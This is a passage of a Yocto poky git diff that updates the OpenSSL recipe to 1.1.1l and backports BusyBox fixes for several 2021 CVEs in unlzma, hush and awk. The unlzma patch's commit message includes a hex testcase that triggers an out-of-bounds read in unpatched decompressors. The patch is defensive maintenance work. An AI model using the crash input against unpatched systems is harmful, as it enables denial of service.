-DOPENSSLDIR=/not/builtin -DENGINESDIR=/not/builtin" -CFLAGS_append_class-nativesdk = " -DOPENSSLDIR=/not/builtin -DENGINESDIR=/not/builtin" - -do_configure () { - os=${HOST_OS} - case $os in - linux-gnueabi |\ - linux-gnuspe |\ - linux-musleabi |\ - linux-muslspe |\ - linux-musl ) - os=linux - ;; - *) - ;; - esac - target="$os-${HOST_ARCH}" - case $target in - linux-arm*) - target=linux-armv4 - ;; - linux-aarch64*) - target=linux-aarch64 - ;; - linux-i?86 | linux-viac3) - target=linux-x86 - ;; - linux-gnux32-x86_64 | linux-muslx32-x86_64 ) - target=linux-x32 - ;; - linux-gnu64-x86_64) - target=linux-x86_64 - ;; - linux-mips | linux-mipsel) - # specifying TARGET_CC_ARCH prevents openssl from (incorrectly) adding target architecture flags - target="linux-mips32 ${TARGET_CC_ARCH}" - ;; - linux-gnun32-mips*) - target=linux-mips64 - ;; - linux-*-mips64 | linux-mips64 | linux-*-mips64el | linux-mips64el) - target=linux64-mips64 - ;; - linux-microblaze* | linux-nios2* | linux-sh3 | linux-sh4 | linux-arc*) - target=linux-generic32 - ;; - linux-powerpc) - target=linux-ppc - ;; - linux-powerpc64) - target=linux-ppc64 - ;; - linux-powerpc64le) - target=linux-ppc64le - ;; - linux-riscv32) - target=linux-generic32 - ;; - linux-riscv64) - target=linux-generic64 - ;; - linux-sparc | linux-supersparc) - target=linux-sparcv9 - ;; - esac - - useprefix=${prefix} - if [ "x$useprefix" = "x" ]; then - useprefix=/ - fi - # WARNING: do not set compiler/linker flags (-I/-D etc.) in EXTRA_OECONF, as they will fully replace the - # environment variables set by bitbake. Adjust the environment variables instead. - HASHBANGPERL="/usr/bin/env perl" PERL=perl PERL5LIB="${S}/external/perl/Text-Template-1.46/lib/" \ - perl ${S}/Configure ${EXTRA_OECONF} ${PACKAGECONFIG_CONFARGS} --prefix=$useprefix --openssldir=${libdir}/ssl-1.1 --libdir=${libdir} $target - perl ${B}/configdata.pm --dump -} - -do_install () { - oe_runmake DESTDIR="${D}" MANDIR="${mandir}" MANSUFFIX=ssl install - - oe_multilib_header openssl/opensslconf.h - - # Create SSL structure for packages such as ca-certificates which - # contain hard-coded paths to /etc/ssl. Debian does the same. - install -d ${D}${sysconfdir}/ssl - mv ${D}${libdir}/ssl-1.1/certs \ - ${D}${libdir}/ssl-1.1/private \ - ${D}${libdir}/ssl-1.1/openssl.cnf \ - ${D}${sysconfdir}/ssl/ - - # Although absolute symlinks would be OK for the target, they become - # invalid if native or nativesdk are relocated from sstate. - ln -sf ${@oe.path.relative('${libdir}/ssl-1.1', '${sysconfdir}/ssl/certs')} ${D}${libdir}/ssl-1.1/certs - ln -sf ${@oe.path.relative('${libdir}/ssl-1.1', '${sysconfdir}/ssl/private')} ${D}${libdir}/ssl-1.1/private - ln -sf ${@oe.path.relative('${libdir}/ssl-1.1', '${sysconfdir}/ssl/openssl.cnf')} ${D}${libdir}/ssl-1.1/openssl.cnf -} - -do_install_append_class-native () { - create_wrapper ${D}${bindir}/openssl \ - OPENSSL_CONF=${libdir}/ssl-1.1/openssl.cnf \ - SSL_CERT_DIR=${libdir}/ssl-1.1/certs \ - SSL_CERT_FILE=${libdir}/ssl-1.1/cert.pem \ - OPENSSL_ENGINES=${libdir}/engines-1.1 -} - -do_install_append_class-nativesdk () { - mkdir -p ${D}${SDKPATHNATIVE}/environment-setup.d - install -m 644 ${WORKDIR}/environment.d-openssl.sh ${D}${SDKPATHNATIVE}/environment-setup.d/openssl.sh - sed 's|/usr/lib/ssl/|/usr/lib/ssl-1.1/|g' -i ${D}${SDKPATHNATIVE}/environment-setup.d/openssl.sh -} - -PTEST_BUILD_HOST_FILES += "configdata.pm" -PTEST_BUILD_HOST_PATTERN = "perl_version =" -do_install_ptest () { - # Prune the build tree - rm -f ${B}/fuzz/*.* ${B}/test/*.* - - cp ${S}/Configure ${B}/configdata.pm ${D}${PTEST_PATH} - cp -r ${S}/external ${B}/test ${S}/test ${B}/fuzz ${S}/util ${B}/util ${D}${PTEST_PATH} - - # For test_shlibload - ln -s ${libdir}/libcrypto.so.1.1 ${D}${PTEST_PATH}/ - ln -s ${libdir}/libssl.so.1.1 ${D}${PTEST_PATH}/ - - install -d ${D}${PTEST_PATH}/apps - ln -s ${bindir}/openssl ${D}${PTEST_PATH}/apps - install -m644 ${S}/apps/*.pem ${S}/apps/*.srl ${S}/apps/openssl.cnf ${D}${PTEST_PATH}/apps - install -m755 ${B}/apps/CA.pl ${D}${PTEST_PATH}/apps - - install -d ${D}${PTEST_PATH}/engines - install -m755 ${B}/engines/ossltest.so ${D}${PTEST_PATH}/engines -} - -# Add the openssl.cnf file to the openssl-conf package. Make the libcrypto -# package RRECOMMENDS on this package. This will enable the configuration -# file to be installed for both the openssl-bin package and the libcrypto -# package since the openssl-bin package depends on the libcrypto package. - -PACKAGES =+ "libcrypto libssl openssl-conf ${PN}-engines ${PN}-misc" - -FILES_libcrypto = "${libdir}/libcrypto${SOLIBS}" -FILES_libssl = "${libdir}/libssl${SOLIBS}" -FILES_openssl-conf = "${sysconfdir}/ssl/openssl.cnf \ - ${libdir}/ssl-1.1/openssl.cnf* \ - " -FILES_${PN}-engines = "${libdir}/engines-1.1" -FILES_${PN}-misc = "${libdir}/ssl-1.1/misc" -FILES_${PN} =+ "${libdir}/ssl-1.1/*" -FILES_${PN}_append_class-nativesdk = " ${SDKPATHNATIVE}/environment-setup.d/openssl.sh" - -CONFFILES_openssl-conf = "${sysconfdir}/ssl/openssl.cnf" - -RRECOMMENDS_libcrypto += "openssl-conf" -RDEPENDS_${PN}-ptest += "openssl-bin perl perl-modules bash" - -RDEPENDS_${PN}-bin += "openssl-conf" - -BBCLASSEXTEND = "native nativesdk" - -CVE_PRODUCT = "openssl:openssl" - -CVE_VERSION_SUFFIX = "alphabetical" - -# Only affects OpenSSL >= 1.1.1 in combination with Apache < 2.4.37 -# Apache in meta-webserver is already recent enough -CVE_CHECK_WHITELIST += "CVE-2019-0190" diff --git a/poky/meta/recipes-connectivity/openssl/openssl_1.1.1l.bb b/poky/meta/recipes-connectivity/openssl/openssl_1.1.1l.bb new file mode 100644 index 0000000000..bf7cd6527e --- /dev/null +++ b/poky/meta/recipes-connectivity/openssl/openssl_1.1.1l.bb @@ -0,0 +1,218 @@ +SUMMARY = "Secure Socket Layer" +DESCRIPTION = "Secure Socket Layer (SSL) binary and related cryptographic tools." +HOMEPAGE = "http://www.openssl.org/" +BUGTRACKER = "http://www.openssl.org/news/vulnerabilities.html" +SECTION = "libs/network" + +# "openssl" here actually means both OpenSSL and SSLeay licenses apply +# (see meta/files/common-licenses/OpenSSL to which "openssl" is SPDXLICENSEMAPped) +LICENSE = "openssl" +LIC_FILES_CHKSUM = "file://LICENSE;md5=d343e62fc9c833710bbbed25f27364c8" + +DEPENDS = "hostperl-runtime-native" + +SRC_URI = "http://www.openssl.org/source/openssl-${PV}.tar.gz \ + file://run-ptest \ + file://0001-skip-test_symbol_presence.patch \ + file://0001-buildinfo-strip-sysroot-and-debug-prefix-map-from-co.patch \ + file://afalg.patch \ + file://reproducible.patch \ + file://reproducibility.patch \ + " + +SRC_URI_append_class-nativesdk = " \ + file://environment.d-openssl.sh \ + " + +SRC_URI[sha256sum] = "0b7a3e5e59c34827fe0c3a74b7ec8baef302b98fa80088d7f9153aa16fa76bd1" + +inherit lib_package multilib_header multilib_script ptest +MULTILIB_SCRIPTS = "${PN}-bin:${bindir}/c_rehash" + +PACKAGECONFIG ?= "" +PACKAGECONFIG_class-native = "" +PACKAGECONFIG_class-nativesdk = "" + +PACKAGECONFIG[cryptodev-linux] = "enable-devcryptoeng,disable-devcryptoeng,cryptodev-linux,,cryptodev-module" + +B = "${WORKDIR}/build" +do_configure[cleandirs] = "${B}" + +#| ./libcrypto.so: undefined reference to `getcontext' +#| ./libcrypto.so: undefined reference to `setcontext' +#| ./libcrypto.so: undefined reference to `makecontext' +EXTRA_OECONF_append_libc-musl = " no-async" +EXTRA_OECONF_append_libc-musl_powerpc64 = " no-asm" + +# adding devrandom prevents openssl from using getrandom() which is not available on older glibc versions +# (native versions can be built with newer glibc, but then relocated onto a system with older glibc) +EXTRA_OECONF_class-native = "--with-rand-seed=os,devrandom" +EXTRA_OECONF_class-nativesdk = "--with-rand-seed=os,devrandom" + +# Relying on hardcoded built-in paths causes openssl-native to not be relocateable from sstate. +CFLAGS_append_class-native = " -DOPENSSLDIR=/not/builtin -DENGINESDIR=/not/builtin" +CFLAGS_append_class-nativesdk = " -DOPENSSLDIR=/not/builtin -DENGINESDIR=/not/builtin" + +do_configure () { + os=${HOST_OS} + case $os in + linux-gnueabi |\ + linux-gnuspe |\ + linux-musleabi |\ + linux-muslspe |\ + linux-musl ) + os=linux + ;; + *) + ;; + esac + target="$os-${HOST_ARCH}" + case $target in + linux-arm*) + target=linux-armv4 + ;; + linux-aarch64*) + target=linux-aarch64 + ;; + linux-i?86 | linux-viac3) + target=linux-x86 + ;; + linux-gnux32-x86_64 | linux-muslx32-x86_64 ) + target=linux-x32 + ;; + linux-gnu64-x86_64) + target=linux-x86_64 + ;; + linux-mips | linux-mipsel) + # specifying TARGET_CC_ARCH prevents openssl from (incorrectly) adding target architecture flags + target="linux-mips32 ${TARGET_CC_ARCH}" + ;; + linux-gnun32-mips*) + target=linux-mips64 + ;; + linux-*-mips64 | linux-mips64 | linux-*-mips64el | linux-mips64el) + target=linux64-mips64 + ;; + linux-microblaze* | linux-nios2* | linux-sh3 | linux-sh4 | linux-arc*) + target=linux-generic32 + ;; + linux-powerpc) + target=linux-ppc + ;; + linux-powerpc64) + target=linux-ppc64 + ;; + linux-powerpc64le) + target=linux-ppc64le + ;; + linux-riscv32) + target=linux-generic32 + ;; + linux-riscv64) + target=linux-generic64 + ;; + linux-sparc | linux-supersparc) + target=linux-sparcv9 + ;; + esac + + useprefix=${prefix} + if [ "x$useprefix" = "x" ]; then + useprefix=/ + fi + # WARNING: do not set compiler/linker flags (-I/-D etc.) in EXTRA_OECONF, as they will fully replace the + # environment variables set by bitbake. Adjust the environment variables instead. + HASHBANGPERL="/usr/bin/env perl" PERL=perl PERL5LIB="${S}/external/perl/Text-Template-1.46/lib/" \ + perl ${S}/Configure ${EXTRA_OECONF} ${PACKAGECONFIG_CONFARGS} --prefix=$useprefix --openssldir=${libdir}/ssl-1.1 --libdir=${libdir} $target + perl ${B}/configdata.pm --dump +} + +do_install () { + oe_runmake DESTDIR="${D}" MANDIR="${mandir}" MANSUFFIX=ssl install + + oe_multilib_header openssl/opensslconf.h + + # Create SSL structure for packages such as ca-certificates which + # contain hard-coded paths to /etc/ssl. Debian does the same. + install -d ${D}${sysconfdir}/ssl + mv ${D}${libdir}/ssl-1.1/certs \ + ${D}${libdir}/ssl-1.1/private \ + ${D}${libdir}/ssl-1.1/openssl.cnf \ + ${D}${sysconfdir}/ssl/ + + # Although absolute symlinks would be OK for the target, they become + # invalid if native or nativesdk are relocated from sstate. + ln -sf ${@oe.path.relative('${libdir}/ssl-1.1', '${sysconfdir}/ssl/certs')} ${D}${libdir}/ssl-1.1/certs + ln -sf ${@oe.path.relative('${libdir}/ssl-1.1', '${sysconfdir}/ssl/private')} ${D}${libdir}/ssl-1.1/private + ln -sf ${@oe.path.relative('${libdir}/ssl-1.1', '${sysconfdir}/ssl/openssl.cnf')} ${D}${libdir}/ssl-1.1/openssl.cnf +} + +do_install_append_class-native () { + create_wrapper ${D}${bindir}/openssl \ + OPENSSL_CONF=${libdir}/ssl-1.1/openssl.cnf \ + SSL_CERT_DIR=${libdir}/ssl-1.1/certs \ + SSL_CERT_FILE=${libdir}/ssl-1.1/cert.pem \ + OPENSSL_ENGINES=${libdir}/engines-1.1 +} + +do_install_append_class-nativesdk () { + mkdir -p ${D}${SDKPATHNATIVE}/environment-setup.d + install -m 644 ${WORKDIR}/environment.d-openssl.sh ${D}${SDKPATHNATIVE}/environment-setup.d/openssl.sh + sed 's|/usr/lib/ssl/|/usr/lib/ssl-1.1/|g' -i ${D}${SDKPATHNATIVE}/environment-setup.d/openssl.sh +} + +PTEST_BUILD_HOST_FILES += "configdata.pm" +PTEST_BUILD_HOST_PATTERN = "perl_version =" +do_install_ptest () { + # Prune the build tree + rm -f ${B}/fuzz/*.* ${B}/test/*.* + + cp ${S}/Configure ${B}/configdata.pm ${D}${PTEST_PATH} + cp -r ${S}/external ${B}/test ${S}/test ${B}/fuzz ${S}/util ${B}/util ${D}${PTEST_PATH} + + # For test_shlibload + ln -s ${libdir}/libcrypto.so.1.1 ${D}${PTEST_PATH}/ + ln -s ${libdir}/libssl.so.1.1 ${D}${PTEST_PATH}/ + + install -d ${D}${PTEST_PATH}/apps + ln -s ${bindir}/openssl ${D}${PTEST_PATH}/apps + install -m644 ${S}/apps/*.pem ${S}/apps/*.srl ${S}/apps/openssl.cnf ${D}${PTEST_PATH}/apps + install -m755 ${B}/apps/CA.pl ${D}${PTEST_PATH}/apps + + install -d ${D}${PTEST_PATH}/engines + install -m755 ${B}/engines/ossltest.so ${D}${PTEST_PATH}/engines +} + +# Add the openssl.cnf file to the openssl-conf package. Make the libcrypto +# package RRECOMMENDS on this package. This will enable the configuration +# file to be installed for both the openssl-bin package and the libcrypto +# package since the openssl-bin package depends on the libcrypto package. + +PACKAGES =+ "libcrypto libssl openssl-conf ${PN}-engines ${PN}-misc" + +FILES_libcrypto = "${libdir}/libcrypto${SOLIBS}" +FILES_libssl = "${libdir}/libssl${SOLIBS}" +FILES_openssl-conf = "${sysconfdir}/ssl/openssl.cnf \ + ${libdir}/ssl-1.1/openssl.cnf* \ + " +FILES_${PN}-engines = "${libdir}/engines-1.1" +FILES_${PN}-misc = "${libdir}/ssl-1.1/misc" +FILES_${PN} =+ "${libdir}/ssl-1.1/*" +FILES_${PN}_append_class-nativesdk = " ${SDKPATHNATIVE}/environment-setup.d/openssl.sh" + +CONFFILES_openssl-conf = "${sysconfdir}/ssl/openssl.cnf" + +RRECOMMENDS_libcrypto += "openssl-conf" +RDEPENDS_${PN}-ptest += "openssl-bin perl perl-modules bash" + +RDEPENDS_${PN}-bin += "openssl-conf" + +BBCLASSEXTEND = "native nativesdk" + +CVE_PRODUCT = "openssl:openssl" + +CVE_VERSION_SUFFIX = "alphabetical" + +# Only affects OpenSSL >= 1.1.1 in combination with Apache < 2.4.37 +# Apache in meta-webserver is already recent enough +CVE_CHECK_WHITELIST += "CVE-2019-0190" diff --git a/poky/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb b/poky/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb index 67959576e8..f482bd297f 100644 --- a/poky/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb +++ b/poky/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb @@ -11,7 +11,7 @@ AUTHOR = "Thomas Hood" HOMEPAGE = "http://packages.debian.org/resolvconf" RDEPENDS_${PN} = "bash" -SRC_URI = "git://salsa.debian.org/debian/resolvconf.git;protocol=https \ +SRC_URI = "git://salsa.debian.org/debian/resolvconf.git;protocol=https;branch=master \ file://fix-path-for-busybox.patch \ file://99_resolvconf \ " diff --git a/poky/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch b/poky/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch new file mode 100644 index 0000000000..aef8a3db85 --- /dev/null +++ b/poky/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch @@ -0,0 +1,53 @@ +From 04f052c56ded5ab6a904e3a264a73dc0412b2e78 Mon Sep 17 00:00:00 2001 +From: Denys Vlasenko +Date: Tue, 15 Jun 2021 15:07:57 +0200 +Subject: [PATCH] unlzma: fix a case where we could read before beginning of + buffer +Cc: pavel@zhukoff.net + +Testcase: + + 21 01 01 00 00 00 00 00 e7 01 01 01 ef 00 df b6 + 00 17 02 10 11 0f ff 00 16 00 00 + +Unfortunately, the bug is not reliably causing a segfault, +the behavior depends on what's in memory before the buffer. + +function old new delta +unpack_lzma_stream 2762 2768 +6 + +Signed-off-by: Denys Vlasenko + +Signed-off-by: Pavel Zhukov + +CVE: CVE-2021-42374 +Upstream-Status: Backport [https://git.busybox.net/busybox/commit/?h=1_33_stable&id=d326be2850ea2bd78fe2c22d6c45c3b861d82937] +Comment: testdata dropped because of binary format + +--- + archival/libarchive/decompress_unlzma.c | 5 ++++- + testsuite/unlzma.tests | 17 +++++++++++++---- + testsuite/unlzma_issue_3.lzma | Bin 0 -> 27 bytes + 3 files changed, 17 insertions(+), 5 deletions(-) + create mode 100644 testsuite/unlzma_issue_3.lzma + +diff --git a/archival/libarchive/decompress_unlzma.c b/archival/libarchive/decompress_unlzma.c +index 0744f231a1d64d92676b0cada2342f88f3b39b31..fb5aac8fe9ea0c53e0c2d7a7cbd05a753e39bc9d 100644 +--- a/archival/libarchive/decompress_unlzma.c ++++ b/archival/libarchive/decompress_unlzma.c +@@ -290,8 +290,11 @@ unpack_lzma_stream(transformer_state_t *xstate) + uint32_t pos; + + pos = buffer_pos - rep0; +- if ((int32_t)pos < 0) ++ if ((int32_t)pos < 0) { + pos += header.dict_size; ++ if ((int32_t)pos < 0) ++ goto bad; ++ } + match_byte = buffer[pos]; + do { + int bit; +-- +2.34.0 + diff --git a/poky/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch b/poky/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch new file mode 100644 index 0000000000..c913eaee9c --- /dev/null +++ b/poky/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch @@ -0,0 +1,138 @@ +From 56a335378ac100d51c30b21eee499a2effa37fba Mon Sep 17 00:00:00 2001 +From: Denys Vlasenko +Date: Tue, 15 Jun 2021 16:05:57 +0200 +Subject: hush: fix handling of \^C and "^C" + +function old new delta +parse_stream 2238 2252 +14 +encode_string 243 256 +13 +------------------------------------------------------------------------------ +(add/remove: 0/0 grow/shrink: 2/0 up/down: 27/0) Total: 27 bytes + +Signed-off-by: Denys Vlasenko +(cherry picked from commit 1b7a9b68d0e9aa19147d7fda16eb9a6b54156985) + +Signed-off-by: Pavel Zhukov + +CVE: CVE-2021-42376 +Upstream-Status: Backport [https://git.busybox.net/busybox/patch/?id=56a335378ac100d51c30b21eee499a2effa37fba] +Comment: No changes in any hunk +--- + shell/ash_test/ash-misc/control_char3.right | 1 + + shell/ash_test/ash-misc/control_char3.tests | 2 ++ + shell/ash_test/ash-misc/control_char4.right | 1 + + shell/ash_test/ash-misc/control_char4.tests | 2 ++ + shell/hush.c | 11 +++++++++++ + shell/hush_test/hush-misc/control_char3.right | 1 + + shell/hush_test/hush-misc/control_char3.tests | 2 ++ + shell/hush_test/hush-misc/control_char4.right | 1 + + shell/hush_test/hush-misc/control_char4.tests | 2 ++ + 9 files changed, 23 insertions(+) + create mode 100644 shell/ash_test/ash-misc/control_char3.right + create mode 100755 shell/ash_test/ash-misc/control_char3.tests + create mode 100644 shell/ash_test/ash-misc/control_char4.right + create mode 100755 shell/ash_test/ash-misc/control_char4.tests + create mode 100644 shell/hush_test/hush-misc/control_char3.right + create mode 100755 shell/hush_test/hush-misc/control_char3.tests + create mode 100644 shell/hush_test/hush-misc/control_char4.right + create mode 100755 shell/hush_test/hush-misc/control_char4.tests + +diff --git a/shell/ash_test/ash-misc/control_char3.right b/shell/ash_test/ash-misc/control_char3.right +new file mode 100644 +index 000000000..283e02cbb +--- /dev/null ++++ b/shell/ash_test/ash-misc/control_char3.right +@@ -0,0 +1 @@ ++SHELL: line 1: : not found +diff --git a/shell/ash_test/ash-misc/control_char3.tests b/shell/ash_test/ash-misc/control_char3.tests +new file mode 100755 +index 000000000..4359db3f3 +--- /dev/null ++++ b/shell/ash_test/ash-misc/control_char3.tests +@@ -0,0 +1,2 @@ ++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages) ++$THIS_SH -c '\' SHELL +diff --git a/shell/ash_test/ash-misc/control_char4.right b/shell/ash_test/ash-misc/control_char4.right +new file mode 100644 +index 000000000..2bf18e684 +--- /dev/null ++++ b/shell/ash_test/ash-misc/control_char4.right +@@ -0,0 +1 @@ ++SHELL: line 1: -: not found +diff --git a/shell/ash_test/ash-misc/control_char4.tests b/shell/ash_test/ash-misc/control_char4.tests +new file mode 100755 +index 000000000..48010f154 +--- /dev/null ++++ b/shell/ash_test/ash-misc/control_char4.tests +@@ -0,0 +1,2 @@ ++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages) ++$THIS_SH -c '"-"' SHELL +diff --git a/shell/hush.c b/shell/hush.c +index 9fead37da..249728b9d 100644 +--- a/shell/hush.c ++++ b/shell/hush.c +@@ -5235,6 +5235,11 @@ static int encode_string(o_string *as_string, + } + #endif + o_addQchr(dest, ch); ++ if (ch == SPECIAL_VAR_SYMBOL) { ++ /* Convert "^C" to corresponding special variable reference */ ++ o_addchr(dest, SPECIAL_VAR_QUOTED_SVS); ++ o_addchr(dest, SPECIAL_VAR_SYMBOL); ++ } + goto again; + #undef as_string + } +@@ -5346,6 +5351,11 @@ static struct pipe *parse_stream(char **pstring, + if (ch == '\n') + continue; /* drop \, get next char */ + nommu_addchr(&ctx.as_string, '\\'); ++ if (ch == SPECIAL_VAR_SYMBOL) { ++ nommu_addchr(&ctx.as_string, ch); ++ /* Convert \^C to corresponding special variable reference */ ++ goto case_SPECIAL_VAR_SYMBOL; ++ } + o_addchr(&ctx.word, '\\'); + if (ch == EOF) { + /* Testcase: eval 'echo Ok\' */ +@@ -5670,6 +5680,7 @@ static struct pipe *parse_stream(char **pstring, + /* Note: nommu_addchr(&ctx.as_string, ch) is already done */ + + switch (ch) { ++ case_SPECIAL_VAR_SYMBOL: + case SPECIAL_VAR_SYMBOL: + /* Convert raw ^C to corresponding special variable reference */ + o_addchr(&ctx.word, SPECIAL_VAR_SYMBOL); +diff --git a/shell/hush_test/hush-misc/control_char3.right b/shell/hush_test/hush-misc/control_char3.right +new file mode 100644 +index 000000000..94b4f8699 +--- /dev/null ++++ b/shell/hush_test/hush-misc/control_char3.right +@@ -0,0 +1 @@ ++hush: can't execute '': No such file or directory +diff --git a/shell/hush_test/hush-misc/control_char3.tests b/shell/hush_test/hush-misc/control_char3.tests +new file mode 100755 +index 000000000..4359db3f3 +--- /dev/null ++++ b/shell/hush_test/hush-misc/control_char3.tests +@@ -0,0 +1,2 @@ ++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages) ++$THIS_SH -c '\' SHELL +diff --git a/shell/hush_test/hush-misc/control_char4.right b/shell/hush_test/hush-misc/control_char4.right +new file mode 100644 +index 000000000..698e21427 +--- /dev/null ++++ b/shell/hush_test/hush-misc/control_char4.right +@@ -0,0 +1 @@ ++hush: can't execute '-': No such file or directory +diff --git a/shell/hush_test/hush-misc/control_char4.tests b/shell/hush_test/hush-misc/control_char4.tests +new file mode 100755 +index 000000000..48010f154 +--- /dev/null ++++ b/shell/hush_test/hush-misc/control_char4.tests +@@ -0,0 +1,2 @@ ++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages) ++$THIS_SH -c '"-"' SHELL +-- +cgit v1.2.3 + diff --git a/poky/meta/recipes-core/busybox/busybox_1.31.1.bb b/poky/meta/recipes-core/busybox/busybox_1.31.1.bb index d9d5f4f96b..38b448b3e1 100644 --- a/poky/meta/recipes-core/busybox/busybox_1.31.1.bb +++ b/poky/meta/recipes-core/busybox/busybox_1.31.1.bb @@ -52,6 +52,9 @@ SRC_URI = "https://busybox.net/downloads/busybox-${PV}.tar.bz2;name=tarball \ file://0001-hwclock-make-glibc-2.31-compatible.patch \ file://0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch \ file://0001-mktemp-add-tmpdir-option.patch \ + file://CVE-2021-42374.patch \ + file://CVE-2021-42376.patch \ + file://CVE-2021-423xx-awk.patch \ " SRC_URI_append_libc-musl = " file://musl.cfg " diff --git a/poky/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch b/poky/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch new file mode 100644 index 0000000000..7e3d47b88c --- /dev/null +++ b/poky/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch @@ -0,0 +1,215 @@ +From a21708eb8d07b4a6dbc1d3e4ace4c5721515a84c Mon Sep 17 00:00:00 2001 +From: Sana Kazi +Date: Wed, 8 Dec 2021 12:25:34 +0530 +Subject: [PATCH] busybox: Fix multiple security issues in awk + +Description: fix multiple security issues in awk +Origin: backported awk.c from busybox 1.34.1 + +CVE: CVE-2021-42378 +CVE: CVE-2021-42379 +CVE: CVE-2021-42380 +CVE: CVE-2021-42381 +CVE: CVE-2021-42382 +CVE: CVE-2021-42384 +CVE: CVE-2021-42385 +CVE: CVE-2021-42386 + +Upstream-Status: Backport [https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/busybox/1:1.30.1-6ubuntu3.1/busybox_1.30.1-6ubuntu3.1.debian.tar.xz] + +Comment: Refreshed first hunk and removed few hunks as they are already present in source. + +Signed-off-by: Sana Kazi +Signed-off-by: Ranjitsinh Rathod + +--- + editors/awk.c | 80 ++++++++++++++++++++++++++++++++++++++------------- + 1 file changed, 60 insertions(+), 20 deletions(-) + +diff --git a/editors/awk.c b/editors/awk.c +index d25508e..4e4f282 100644 +--- a/editors/awk.c ++++ b/editors/awk.c +@@ -272,7 +272,8 @@ typedef struct tsplitter_s { + /* if previous token class is CONCAT1 and next is CONCAT2, concatenation */ + /* operator is inserted between them */ + #define TC_CONCAT1 (TC_VARIABLE | TC_ARRTERM | TC_SEQTERM \ +- | TC_STRING | TC_NUMBER | TC_UOPPOST) ++ | TC_STRING | TC_NUMBER | TC_UOPPOST \ ++ | TC_LENGTH) + #define TC_CONCAT2 (TC_OPERAND | TC_UOPPRE) + + #define OF_RES1 0x010000 +@@ -404,7 +405,7 @@ static const char tokenlist[] ALIGN1 = + + #define OC_B OC_BUILTIN + +-static const uint32_t tokeninfo[] = { ++static const uint32_t tokeninfo[] ALIGN4 = { + 0, + 0, + OC_REGEXP, +@@ -1070,8 +1071,10 @@ static uint32_t next_token(uint32_t expected) + const uint32_t *ti; + + if (t_rollback) { ++ debug_printf_parse("%s: using rolled-back token\n", __func__); + t_rollback = FALSE; + } else if (concat_inserted) { ++ debug_printf_parse("%s: using concat-inserted token\n", __func__); + concat_inserted = FALSE; + t_tclass = save_tclass; + t_info = save_info; +@@ -1200,7 +1203,11 @@ static uint32_t next_token(uint32_t expected) + goto readnext; + + /* insert concatenation operator when needed */ +- if ((ltclass & TC_CONCAT1) && (tc & TC_CONCAT2) && (expected & TC_BINOP)) { ++ debug_printf_parse("%s: %x %x %x concat_inserted?\n", __func__, ++ (ltclass & TC_CONCAT1), (tc & TC_CONCAT2), (expected & TC_BINOP)); ++ if ((ltclass & TC_CONCAT1) && (tc & TC_CONCAT2) && (expected & TC_BINOP) ++ && !(ltclass == TC_LENGTH && tc == TC_SEQSTART) /* but not for "length(..." */ ++ ) { + concat_inserted = TRUE; + save_tclass = tc; + save_info = t_info; +@@ -1208,6 +1215,7 @@ static uint32_t next_token(uint32_t expected) + t_info = OC_CONCAT | SS | P(35); + } + ++ debug_printf_parse("%s: t_tclass=tc=%x\n", __func__, t_tclass); + t_tclass = tc; + } + ltclass = t_tclass; +@@ -1218,6 +1226,7 @@ static uint32_t next_token(uint32_t expected) + EMSG_UNEXP_EOS : EMSG_UNEXP_TOKEN); + } + ++ debug_printf_parse("%s: returning, ltclass:%x t_double:%f\n", __func__, ltclass, t_double); + return ltclass; + #undef concat_inserted + #undef save_tclass +@@ -1282,7 +1291,7 @@ static node *parse_expr(uint32_t iexp) + glptr = NULL; + + } else if (tc & (TC_BINOP | TC_UOPPOST)) { +- debug_printf_parse("%s: TC_BINOP | TC_UOPPOST\n", __func__); ++ debug_printf_parse("%s: TC_BINOP | TC_UOPPOST tc:%x\n", __func__, tc); + /* for binary and postfix-unary operators, jump back over + * previous operators with higher priority */ + vn = cn; +@@ -1350,8 +1359,10 @@ static node *parse_expr(uint32_t iexp) + v = cn->l.v = xzalloc(sizeof(var)); + if (tc & TC_NUMBER) + setvar_i(v, t_double); +- else ++ else { + setvar_s(v, t_string); ++ xtc &= ~TC_UOPPOST; /* "str"++ is not allowed */ ++ } + break; + + case TC_REGEXP: +@@ -1387,7 +1398,12 @@ static node *parse_expr(uint32_t iexp) + + case TC_LENGTH: + debug_printf_parse("%s: TC_LENGTH\n", __func__); +- next_token(TC_SEQSTART | TC_OPTERM | TC_GRPTERM); ++ next_token(TC_SEQSTART /* length(...) */ ++ | TC_OPTERM /* length; (or newline)*/ ++ | TC_GRPTERM /* length } */ ++ | TC_BINOPX /* length NUM */ ++ | TC_COMMA /* print length, 1 */ ++ ); + rollback_token(); + if (t_tclass & TC_SEQSTART) { + /* It was a "(" token. Handle just like TC_BUILTIN */ +@@ -1747,12 +1763,34 @@ static void fsrealloc(int size) + nfields = size; + } + ++static int regexec1_nonempty(const regex_t *preg, const char *s, regmatch_t pmatch[]) ++{ ++ int r = regexec(preg, s, 1, pmatch, 0); ++ if (r == 0 && pmatch[0].rm_eo == 0) { ++ /* For example, happens when FS can match ++ * an empty string (awk -F ' *'). Logically, ++ * this should split into one-char fields. ++ * However, gawk 5.0.1 searches for first ++ * _non-empty_ separator string match: ++ */ ++ size_t ofs = 0; ++ do { ++ ofs++; ++ if (!s[ofs]) ++ return REG_NOMATCH; ++ regexec(preg, s + ofs, 1, pmatch, 0); ++ } while (pmatch[0].rm_eo == 0); ++ pmatch[0].rm_so += ofs; ++ pmatch[0].rm_eo += ofs; ++ } ++ return r; ++} ++ + static int awk_split(const char *s, node *spl, char **slist) + { +- int l, n; ++ int n; + char c[4]; + char *s1; +- regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough... 